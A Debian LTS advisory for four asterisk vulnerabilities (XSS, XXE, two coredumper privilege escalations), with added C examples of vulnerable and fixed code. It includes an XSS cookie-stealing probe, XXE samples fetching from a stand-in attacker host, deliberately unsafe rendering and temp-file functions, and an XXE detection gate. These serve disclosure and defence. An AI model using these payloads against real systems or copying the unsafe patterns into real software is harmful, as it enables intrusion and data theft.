Debian 11 Asterisk DLA-4515-1 XSS and Privilege Escalation Risks

debian lts
March 30, 2026

Multiple vulnerabilities were discovered in asterisk, an Open Source Private Branch Exchange (PBX) and telephony toolkit.

Summary

CVE-2026-23738

XSS vulnerability in the /httpstatus page. Cookie names/values and GET
parameter names/values are rendered without HTML-escaping, allowing
reflected cross-site scripting attacks. The status page is now also
disabled by default.
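The root cause of this class of bug is untrusted request data concatenated straight into the HTML of the page. The following C program is an added illustration, not Asterisk's /httpstatus code: `render_param_unsafe` shows the vulnerable pattern, `html_escape` and `render_param_safe` show the fix. The function names, the table layout and the request payload are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* The unsafe pattern behind a reflected XSS: attacker-controlled text
   (here a GET parameter name and value) goes straight into the HTML.
   Constructed illustration, not Asterisk's actual /httpstatus code. */
int render_param_unsafe(char *out, size_t outsz, const char *name, const char *value)
{
    int n = snprintf(out, outsz, "<tr><td>%s</td><td>%s</td></tr>\n", name, value);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Replace the five characters that can break out of HTML text or an
   attribute value. Returns bytes written (without the NUL) or -1 when
   the output would not fit: a truncated entity is not safe output. */
int html_escape(char *out, size_t outsz, const char *in)
{
    size_t pos = 0;
    if (outsz == 0)
        return -1;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep;
        size_t n;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        n = strlen(rep);
        if (pos + n + 1 > outsz)
            return -1;
        memcpy(out + pos, rep, n);
        pos += n;
    }
    out[pos] = '\0';
    return (int)pos;
}

/* The hardened form: escape every untrusted field before formatting. */
int render_param_safe(char *out, size_t outsz, const char *name, const char *value)
{
    char ename[512], evalue[512];
    int n;
    if (html_escape(ename, sizeof ename, name) < 0 ||
        html_escape(evalue, sizeof evalue, value) < 0)
        return -1;
    n = snprintf(out, outsz, "<tr><td>%s</td><td>%s</td></tr>\n", ename, evalue);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

int main(void)
{
    /* Constructed request parameter: a classic reflected-XSS probe. */
    const char *payload = "<script>alert(document.cookie)</script>";
    char row[1024];
    if (render_param_unsafe(row, sizeof row, "q", payload) > 0)
        fputs(row, stdout);   /* the script tag reaches the browser intact */
    if (render_param_safe(row, sizeof row, "q", payload) > 0)
        fputs(row, stdout);   /* rendered as inert text */
    return 0;
}
```

Escaping must cover cookie names and values as well as query-string names and values, since the advisory lists all four as unescaped inputs. Independently of the code fix, check http.conf: the page is controlled by the `enablestatus` option, and after this update it stays off unless that option is explicitly enabled, so only turn it on where the status page is actually needed.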

CVE-2026-23739

XXE injection vulnerability in xml.c. The XML parsing functions allow
external entity processing which can be exploited for XML External Entity
injection attacks via network-based entity resolution.
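Asterisk's xml.c is a thin wrapper over libxml2, so the parser-side fix is to stop passing XML_PARSE_NOENT and XML_PARSE_DTDLOAD and to pass XML_PARSE_NONET, which blocks the network entity resolution the advisory describes. A defence that does not depend on the parser's option set is to refuse any document that declares a DTD at all, since a service like this never needs one. The program below is an added example and not Asterisk's code; `classify_xml` and `xml_safe_to_parse` are hypothetical names, and the sample documents (including the attacker.invalid host) are constructed.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Verdicts for a document inspected before it reaches the XML parser. */
enum xml_verdict {
    XML_OK = 0,             /* no DTD at all: nothing for XXE to exploit */
    XML_HAS_DOCTYPE,        /* internal DTD, no external references */
    XML_EXTERNAL_ENTITY,    /* SYSTEM/PUBLIC entity: file or network read */
    XML_PARAMETER_ENTITY    /* <!ENTITY % ...>: out-of-band / blind XXE */
};

/* Hypothetical pre-parse gate, not Asterisk's xml.c. The XML grammar only
   allows a DOCTYPE in the prolog and the keyword is case-sensitive, so a
   substring search cannot miss a real declaration; it can only over-reject
   (e.g. "<!DOCTYPE" inside a comment), which is the safe direction for a
   service that never needs DTDs. The finer verdicts exist for logging. */
enum xml_verdict classify_xml(const char *doc)
{
    const char *dt = strstr(doc, "<!DOCTYPE");
    const char *p;
    if (dt == NULL)
        return XML_OK;
    for (p = dt; (p = strstr(p, "<!ENTITY")) != NULL; p += 8) {
        const char *q = p + 8;
        while (*q == ' ' || *q == '\t' || *q == '\n' || *q == '\r')
            q++;
        if (*q == '%')
            return XML_PARAMETER_ENTITY;
    }
    if (strstr(dt, "SYSTEM") != NULL || strstr(dt, "PUBLIC") != NULL)
        return XML_EXTERNAL_ENTITY;
    return XML_HAS_DOCTYPE;
}

/* Policy: anything carrying a DTD is rejected before parsing. */
bool xml_safe_to_parse(const char *doc)
{
    return classify_xml(doc) == XML_OK;
}

/* Constructed samples; attacker.invalid is a reserved, non-resolving name. */
const char SAMPLE_OK[] =
    "<?xml version=\"1.0\"?><response><status>ok</status></response>";
const char SAMPLE_XXE[] =
    "<?xml version=\"1.0\"?>\n"
    "<!DOCTYPE r [<!ENTITY xxe SYSTEM \"http://attacker.invalid/leak\">]>\n"
    "<r>&xxe;</r>";
const char SAMPLE_BLIND[] =
    "<?xml version=\"1.0\"?>\n"
    "<!DOCTYPE r [<!ENTITY % dtd SYSTEM \"http://attacker.invalid/evil.dtd\"> %dtd;]>\n"
    "<r/>";
const char SAMPLE_INTERNAL[] =
    "<?xml version=\"1.0\"?><!DOCTYPE r [<!ENTITY a \"b\">]><r>&a;</r>";

int main(void)
{
    static const char *const names[] = { "ok", "doctype", "external", "parameter" };
    printf("benign:   %s\n", names[classify_xml(SAMPLE_OK)]);
    printf("xxe:      %s\n", names[classify_xml(SAMPLE_XXE)]);
    printf("blind:    %s\n", names[classify_xml(SAMPLE_BLIND)]);
    printf("internal: %s\n", names[classify_xml(SAMPLE_INTERNAL)]);
    return 0;
}
```

Run the gate on the raw bytes before the parser sees them; keeping the parser's own entity and network options off as well means a document that slips through the gate still cannot fetch anything.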

CVE-2026-23740

Privilege escalation via ast_coredumper gdbinit file permissions. The
script creates temporary files with default umask permissions, potentially
allowing local users to read or tamper with sensitive debugging data.

CVE-2026-23741

Privilege escalation via ast_coredumper sourcing configuration files
without ownership or permission checks. When running as root, a non-root
user could place a malicious config file that gets sourced with root
privileges.
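Both ast_coredumper issues come down to trusting the filesystem state an unprivileged user can influence: a temp file whose mode is left to the umask (CVE-2026-23740) and a config file sourced without checking who owns it or who can write it (CVE-2026-23741). The program below is an added example of the two corresponding checks, written in C rather than the script's shell so the stat logic is explicit; it is not ast_coredumper's code, and `trusted_config_file`, `create_private_tempfile`, `create_umask_tempfile` and `demo` are hypothetical names. The demo creates its files under /tmp (falling back to the current directory) and removes them again.

```c
#define _DEFAULT_SOURCE
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not ast_coredumper's): may a privileged process source
   or read this file? It must be a regular file rather than a symlink, owned by
   us or by root, and not writable by group or others; otherwise an
   unprivileged user could have supplied or altered its contents. */
bool trusted_config_file(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return false;
    if (!S_ISREG(st.st_mode))
        return false;
    if (st.st_uid != geteuid() && st.st_uid != 0)
        return false;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return false;
    return true;
}

/* Temp file creation that does not depend on the caller's umask: mkstemp()
   always creates the file 0600; the umask is narrowed as belt and braces. */
int create_private_tempfile(char *tmpl)
{
    mode_t saved = umask(077);
    int fd = mkstemp(tmpl);
    umask(saved);
    return fd;
}

/* The pattern the advisory describes: request 0666 and let the umask decide.
   Under a typical 022 umask this yields 0644, readable by every local user. */
int create_umask_tempfile(const char *path)
{
    return open(path, O_CREAT | O_WRONLY | O_EXCL, 0666);
}

/* Try /tmp first, then the current directory, so the demo runs anywhere. */
static int private_tmp(char *buf, size_t n, const char *base)
{
    int fd;
    snprintf(buf, n, "/tmp/%s-XXXXXX", base);
    fd = create_private_tempfile(buf);
    if (fd < 0) {
        snprintf(buf, n, "./%s-XXXXXX", base);
        fd = create_private_tempfile(buf);
    }
    return fd;
}

/* Self-check; returns 0 when every expectation holds, else a bitmask
   naming the failed expectation, or -1 if no scratch file could be made. */
int demo(void)
{
    char good[64], naive[64], lnk[80];
    struct stat st;
    int rc = 0, gfd, nfd;
    mode_t saved = umask(022);               /* simulate a typical shell umask */

    gfd = private_tmp(good, sizeof good, "gdbinit-private");
    if (gfd < 0) { umask(saved); return -1; }
    if (!trusted_config_file(good)) rc |= 1;     /* 0600 and ours: trusted */
    if (fchmod(gfd, 0666) != 0 || trusted_config_file(good)) rc |= 2;  /* world-writable: rejected */
    snprintf(lnk, sizeof lnk, "%s.lnk", good);
    if (symlink(good, lnk) == 0) {               /* a symlink is never trusted */
        if (trusted_config_file(lnk)) rc |= 8;
        unlink(lnk);
    }

    /* Reserve a unique name, then recreate it the naive way. */
    nfd = private_tmp(naive, sizeof naive, "gdbinit-umask");
    if (nfd < 0) { close(gfd); unlink(good); umask(saved); return -1; }
    close(nfd);
    unlink(naive);
    nfd = create_umask_tempfile(naive);
    if (nfd < 0 || fstat(nfd, &st) != 0 || !(st.st_mode & S_IROTH)) rc |= 4;  /* expected: readable by others */

    if (nfd >= 0) close(nfd);
    close(gfd);
    unlink(good);
    unlink(naive);
    umask(saved);
    return rc;
}

int main(void)
{
    printf("demo result: %d (0 means all checks behaved as expected)\n", demo());
    return 0;
}
```

In the shell script itself the equivalent is `umask 077` before any `mktemp`, and a `stat -c '%u %a'` check on ownership and mode before each `source`; the C version makes the individual conditions and their ordering explicit.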


Severity: important

Package: asterisk
Fixed in version: 1:16.28.0~dfsg-0+deb11u9
CVE ID: CVE-2026-23738 CVE-2026-23739 CVE-2026-23740 CVE-2026-23741
Debian Bug: 1127438
